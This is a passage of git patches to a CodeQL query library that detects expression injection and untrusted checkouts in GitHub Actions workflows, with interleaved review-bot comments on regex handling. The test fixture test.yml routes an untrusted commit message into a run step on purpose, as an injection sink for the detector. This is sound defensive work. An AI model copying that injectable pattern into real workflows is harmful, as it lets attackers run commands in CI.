context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") } bindingset[context] private predicate isExternalUserControlledComment(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") } bindingset[context] private predicate isExternalUserControlledGollum(string context) { - context - 
.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") + exists(string reg | + reg = + [ + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + ] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] 
@@ -69,26 +77,29 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") + 
exists(string reg | + reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -96,18 +107,18 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.workflow\\.path\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.workflow_run\\.display_title\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } From 0e50204672f05fdd33b115ff36a2c9f5c2c10bef Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:19:55 +0100 Subject: [PATCH 094/707] More regexp improvements --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++------ .../codeql/actions/dataflow/ExternalFlow.qll | 4 +- .../codeql/actions/dataflow/FlowSources.qll | 8 +-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 1 + .../CWE-020/CompositeActionsSources.ql | 1 + .../CWE-020/CompositeActionsSummaries.ql | 1 + .../CWE-020/ReusableWorkflowsSinks.ql | 1 + .../CWE-020/ReusableWorkflowsSources.ql | 1 + .../CWE-020/ReusableWorkflowsSummaries.ql | 1 + .../CWE-094/CriticalExpressionInjection.ql | 1 + .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 49 ++++++++++--------- 13 files changed, 59 insertions(+), 45 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 14f3cd2ecd9c..7ebed407c0fd 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,5 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +private import codeql.actions.Ast::Utils as Utils /** * Gets the length of each line in the StringValue . @@ -833,9 +834,9 @@ class StepsExpressionImpl extends ContextExpressionImpl { string fieldName; StepsExpressionImpl() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } 
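Review bot: `StepsExpressionImpl`'s characteristic predicate now calls `Utils::normalizeExpr(expression)` three times, once for the match and once per capture, which repeats the whole replaceAll chain per call unless the evaluator happens to share it, and makes the three lines harder to read than they need to be. Binding the normalized string once keeps the logic in one place: `exists(string norm | norm = Utils::normalizeExpr(expression) | norm.regexpMatch(stepsCtxRegex()) and stepId = norm.regexpCapture(stepsCtxRegex(), 1) and fieldName = norm.regexpCapture(stepsCtxRegex(), 2))`. The same triple call appears in NeedsExpressionImpl, JobsExpressionImpl, InputsExpressionImpl, EnvExpressionImpl and MatrixExpressionImpl in the following hunks. Note that only the matching is normalized while the `expression` field used by `toString()` stays raw, which is reasonable but deserves a one-line comment on the class.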
@@ -856,9 +857,9 @@ class NeedsExpressionImpl extends ContextExpressionImpl { string fieldName; NeedsExpressionImpl() { - expression.regexpMatch(needsCtxRegex()) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -886,9 +887,9 @@ class JobsExpressionImpl extends ContextExpressionImpl { string fieldName; JobsExpressionImpl() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -911,8 +912,8 @@ class InputsExpressionImpl extends ContextExpressionImpl { string fieldName; InputsExpressionImpl() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -936,8 +937,8 @@ class EnvExpressionImpl extends ContextExpressionImpl { string fieldName; EnvExpressionImpl() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -959,8 +960,8 @@ class MatrixExpressionImpl extends ContextExpressionImpl { string fieldName; MatrixExpressionImpl() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 008b5a19ce63..7e265fb2570d 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,6 @@ private import internal.ExternalFlowExtensions as Extensions -import codeql.actions.DataFlow -import actions +private import codeql.actions.DataFlow +private import actions /** * MaD sources diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d3a96e1a2c7a..a586cab4a322 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,7 @@ -import actions -import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow -import codeql.actions.Ast::Utils as Utils +private import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils /** * A data flow source. 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index fddf537ed1df..c10334436aa7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -2,10 +2,10 @@ * Provides classes representing various flow steps for taint tracking. */ -import actions +private import actions private import codeql.util.Unit private import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 1f90efa5bcc9..0ea0713983d3 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec80..8e4275f27c7d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c9..8b8b5af3c459 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow 
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index d84566dab046..31fbc1eaae2a 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36feced..e5612d063432 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f6..444ce028954e 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 66a055634c7e..e24b1ab9ddc0 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow 
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad26..1e7414e5ce6d 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 438e3dfe7fc2..c9ad93d18b20 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
@@ -18,32 +18,37 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - Utils::normalizeExpr(this.getCondition()) - .regexpMatch([ - ".*github\\.actor.*", ".*github\\.triggering_actor.*", - ".*github\\.event\\.pull_request\\.user\\.login.*", - ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" - ]) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) } } bindingset[s] predicate containsHeadRef(string s) { - Utils::normalizeExpr(s) - .matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. + "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. 
+ "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. + "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) } /** Checkout of a Pull Request HEAD ref */ @@ -68,7 +73,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { or exists(string varname | containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - line.matches("%" + varname + "%") + exists(line.regexpFind(varname, _, _)) ) ) ) From 872b1f88f053dbb29a422f5fa0b33b3e0933a907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:47:19 +0100 Subject: [PATCH 095/707] More regexp improvements --- ql/lib/codeql/actions/Ast.qll | 9 +++++---- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- ql/src/Debug/partial.ql | 1 + .../Security/CWE-094/.github/workflows/test.yml | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 10 +++++----- .../Security/CWE-094/ExpressionInjection.expected | 10 +++++----- 6 files changed, 20 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3d675bebce02..143e89512fe5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
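Review bot: `ControlCheck` accepts any `if:` condition in which one of the five terms merely occurs, so a condition that uses `github.event.pull_request.labels` as a value, or a negated comparison on `github.actor`, satisfies it as readily as a genuine allow-list check; the comparison itself is never inspected. The class doc should say so, e.g. `/** An If node whose condition mentions an actor, user or label. Heuristic: only the presence of the term is checked, not what it is compared against. */`. In `containsHeadRef`, the `\\benv\\.GITHUB_HEAD_REF\\b` entry covers the expression form only; a shell-level read of the same variable is not an expression and does not appear to reach this predicate, which is worth a one-line comment on that entry so the limit is known.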
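Review bot: `exists(line.regexpFind(varname, _, _))` uses the environment-variable name as an unanchored regular expression, so a variable named `REF` also matches a `run:` line containing `PREFIX`, and any regex metacharacter in `varname` would be interpreted rather than matched literally; the replaced `matches("%" + varname + "%")` had the same substring weakness, so the change does not tighten it. If the intent is to find the script actually reading the variable, anchoring on a shell reference, `exists(line.regexpFind("\\$\\{?" + varname + "\\b", _, _))`, binds the match to `$NAME` or `${NAME}` instead of any line that happens to contain the letters. The enclosing `GitCheckout` characteristic predicate starts outside the hunk.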
@@ -5,10 +5,9 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.replaceAll("['", ".") - .replaceAll("']", "") - .replaceAll("[\"", ".") - .replaceAll("\"]", "") + //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } } @@ -45,6 +44,8 @@ class Expression extends AstNode instanceof ExpressionImpl { string getExpression() { result = expression } string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7ebed407c0fd..b05dd852dbfe 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -30,8 +30,8 @@ string getASimpleReferenceExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fb31fe209902..702a454645c5 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -8,6 +8,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import PartialFlow::PartialPathGraph 
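Review bot: the commented-out character class `//[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]` left inside the `result =` expression of `normalizeExpr` is dead text with no explanation; delete it or replace it with a comment that states the rewrite, e.g. `// rewrite ['key'] and ["key"] index access to .key so later regexps can assume dot notation`. The previous implementation stripped any `['`/`']` and `["`/`"]` pair, whereas the new regexes only rewrite keys matching `[a-zA-Z0-9_*-]+`, so a key with other characters, or whitespace inside the brackets such as `[ 'key' ]`, now stays in bracket form and will not be matched by the dot-based patterns downstream. If that narrowing is intended, the predicate's QLDoc (currently absent) should say which forms are normalized.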
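Review bot: `getNormalizedExpression()` is added to `Expression` without a QLDoc comment, and its name alone does not tell a query author what "normalized" covers. Propose `/** Gets the expression with bracket index access rewritten to dot access and whitespace around dots removed; see Utils::normalizeExpr. */` above the new predicate.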
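Review bot: the `regexpFind` and `regexpCapture` patterns on the two changed lines of `getASimpleReferenceExpression` must stay in lock-step but are maintained as two separate literals, and they already differ: the capture pattern's class contains `\\((\\)` (a doubled `(`, harmless inside a character class but evidently a typo carried over) where the find pattern has `\\(\\)`. Extracting the class into one helper, e.g. `private string simpleRefCharClass() { result = "[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]" }`, and building both regexps from it removes the duplication and the discrepancy. The enclosing predicate starts outside the hunk.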
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 628b6e6f1bf5..b9fa152e49ab 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -12,7 +12,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event['head_commit']['message'] }} find: 'foo' replace: '' - id: step1 @@ -34,4 +34,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 38884b3eaef4..dfed1edb40a2 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | 
@@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
